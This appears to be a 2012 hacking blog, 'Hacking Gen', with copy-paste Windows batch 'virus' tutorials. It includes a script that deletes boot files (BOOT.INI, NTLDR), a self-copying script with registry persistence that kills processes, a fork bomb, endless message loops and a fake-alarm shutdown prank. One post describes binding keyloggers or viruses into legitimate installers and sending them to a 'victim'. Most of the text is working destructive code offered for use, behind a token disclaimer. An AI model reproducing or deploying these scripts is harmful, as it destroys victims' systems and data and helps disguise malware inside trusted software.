Hacking Gen

Liked us?

Monday 27 February 2012

How To Make A Trojan Virus In Simple Way




Here is the easy way to make a trojan virus it is destructive so dont open it and disable your antivirus.

This one is a Trojan virus. Just copy and paste the code given below in notepad and save it as game.bat(not .txt). Be careful & Don’t run this i.e double click or press enter key on it on your PC.

1) Copy the codes below in notepad 

@ECHO OFF
ATTRIB -R-S-H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R-S-H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R-S-H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R-S-H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

2) Save the file as ''Virus.bat''

Want To Know How To Join This Virus With Any Software Then Visit Here 

Cool Na! Don't Forget To Like,Share And Subscribe.

Sunday 26 February 2012

How To Easily Create Virus To Restart Pc






Well, I know there are lots of techniques available to restart computer. But all the techniques  requires a basic knowledge of  programming. But in this technique you do not need to know whole programming language but you need just little programming  knowledge. You can also create a program to restart window automatically every start up using c or c++ language.You can also programming in other languages and make virus to create a virus to restart program.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.

So first open notepad and paste there following code.

cd..
shutdown /t 30 /r /c "Your computer detects a virus"








Now save as it with .bat extension. and run the file and thats it.


You can see the message that " Your computer detects Virus" and the computer will be shut down in 30 seconds and restart again.
Here,
/t indicates time interval that can be changed.
/r indicates restart windows you can change it to /s to only shutdown windows.
/c indicates the message that you want to display.



 Want To Know How To Join This Virus With Any Software Then Visit Here 


Cool Na! Don't Forget To Like,Share And Subscribe.

How To Make A Virus That Copy Itself Over One Thousand Times


Simple batch virus. (This is quite Destructive ! Use it as i have said.)


This one is a simple batch virus. Just copy and paste the code given below in notepad and save it as game.bat(not .txt). Be careful & Don’t run this i.e double click or press enter key on it on your PC.



1) Copy the below commands into notepad and save it as ''Virus.bat''

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP







What it will Do ?

* Copies itself into startup
* Copy itself over one thousand times into random spots in your computer
* Hide its self and all other created files
* Task kill MSN, Norton, Windows Explorer, Limewire.
* Swap the left mouse button with the right one
* Opens alert boxes
* Changes the time to 12:00 and shuts down the computer

  Want To Know How To Join This Virus With Any Software Then Visit Here 


Cool Na! Don't Forget To Like,Share And Subscribe.


Saturday 25 February 2012

How To Make The Simplest Virus – Overload Bomb






Launching fork bomb will lead to total CPU jam by opening about 500 process or more of command prompt . CPU usage will be overloaded and computer will freeze.


1) Launch notepad and type


%0|%0



2) Save as .bat , for example fork.bat



3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.


Now you just need to do is to send the virus to your victim by binding it with any software

Want To Know How To Join This Virus With Any Software Then Visit Here 

How To Create A Simple Batch File Virus




Here Is A Simple Process On How To Create A Simple Batch File Virus Which Will Keep Pop Upping
Messages And It Cant Be Stopped Only Way To Stop It Is Reboot..

Write the commands in a notepad.
     
Code:


@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * No O.o
msg * Than Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


Save it as "Virus.BAT" and send it to victim or bind it with any software



Want To Know How To Join This Virus With Any Software Then Visit Here 

Easy way to Know your Computer's IP




If you want to know your Compuer,s IP then follow the steps below.;)


1) Open Notepad And Type Codes Below:

 For Windows XP

@echo.
@ipconfig | find "IP Address"
@echo.
@pause

Just Type For Windows 7


@echo.
@ipconfig
@echo.
@pause

2) Then Save File As''IP.bat'' and you are done.




How To Lock Folders With Notepad




You can lock and unlock your folder with this simple trick !
Procedure :1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7.Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8.Lock your folder and hide the key.bat somewhere else on your hard disk !
9.Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

How To Bind Keylogger Or Viruses With Any Other File




File binders or Exe Binders are applications that allow a user to "bind" executables together resulting in a single executable. They are useful for crackers to insert other applications such as trojan horse executables into otherwise harmless files, making them more difficult to detect.


Download Binder From Here



1. Now Go to  folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger file or virus that you have made and then set up of software that you want to give.

4. Now in menu of Binder, Go to Settings. Download setup icon from here  and then select it and then choose where the output file would be placed by clicking on set output file
5. Now again go to File's menu in Binder and click on Bind files.

6. Now your Binded keylogger or virus is ready. Now you have to spread it or send it to the victim that is your friend or enemy...;)

Note: This tutorial is for Educational Purposes only. I and my blog is not responsible for any misuse of knowledge.





Thursday 23 February 2012

Hacking Gen




A Place where next generation hackers meet and learns new tricks..;) 

 Like Our Facebook Page


Wednesday 22 February 2012

About Me



Well i am a student who likes Pc gaming and hacking and doing new type of things..So here is it, “ Hacking Gen”… All my posts are easy and simple even a fool can do it....

If you have any problem with my hacks or tutorials u don't get it u can mail me at trayanshrox@gmail.com and ask me some new type of tricks and hacks u want to know.;)

Facebook ID

How To Make A Fake Or Prank Virus



What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.
 As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.
  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

    Here I will teach you how to make a prank virus this will freak out your friends or whoever you give it to! They will think that their hard drive is going to be fried.



    Creating The Virus

    1) Open up Notepad in Windows. 
    2) Copy and Paste the Code of the “virus” into Notepad
    3) Click File -> Save as
    4) Decide for a location to save the fake-virus. 
    5) Chose a  filename. Replace the “.txt” at the with “.bat”

    Save files as ''Virus.bat'' or ''Lol.bat'' or with any other name


    6) Click on save and close Notepad.


    Code For Fake Virus

    @echo off
    title Trojan Virus Uploader!
    taskkill /f /im explorer.exe
    cls
    shutdown.exe -s -t 420 -c "Trojan Horse has been Downloaded! Your Computer Is Going To BLAST!"
    cls
    :a
    msg * Trojan Horse has been Downloaded! Your Computer Is Going To Be Destroyed!
    start cmd.exe
    start wab.exe
    start magnify.exe
    start sndrec32.exe
    start sndvol32.exe
    start msmsgs.exe
    start osk.exe
    start utilman.exe
    start moviemk.exe
    start mspaint.exe
    start YahooMessenger.exe
    start mshearts.exe
    start freecell.exe
    start wordpad.exe
    start sol.exe
    start winmine.exe
    start  http://www.google.com
    start http://wowomg.org
    start notepad.exe
    start spider.exe
    start calc.exe
    start PINBALL.EXE
    start iexplorer.exe
    echo C:\Dociments and Settings\Desktop>Trojan Virus!
    echo C:\Dociments and Settings\Desktop>Trojan Virus
    echo C:\Dociments and Settings\Desktop>Worm
    echo C:\Dociments and Settings\Desktop>Worm!
    echo C:\Dociments and Settings\Desktop>Spyware 12
    echo C:\Dociments and Settings\Desktop>Spyware 14
    echo C:\Dociments and Settings\Desktop>Spyware 13
    echo C:\Dociments and Settings\Desktop>Spyware 11
    echo C:\Dociments and Settings\My Computer>Trojan Virus
    echo C:\Dociments and Settings\My Computer>Trojan Virus!
    echo C:\Dociments and Settings\My Computer>Worm
    echo C:\Dociments and Settings\My Computer>Worm!
    echo C:\Dociments and Settings\My Computer>Spyware 12
    echo C:\Dociments and Settings\My Computer>Spyware 14
    echo C:\Dociments and Settings\My Computer>Spyware 13
    echo C:\Dociments and Settings\My Computer>Spyware 11
    loop
    goto :a


    Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File And Give It To Our Victim.

    Binding the ''Virus.bat'' file with any other file.


    Want To Know How To Bind File Then Visit Here
Share

Widgets

Powered By Blogger
Receive Free Updates Via Email. Subscribe Now!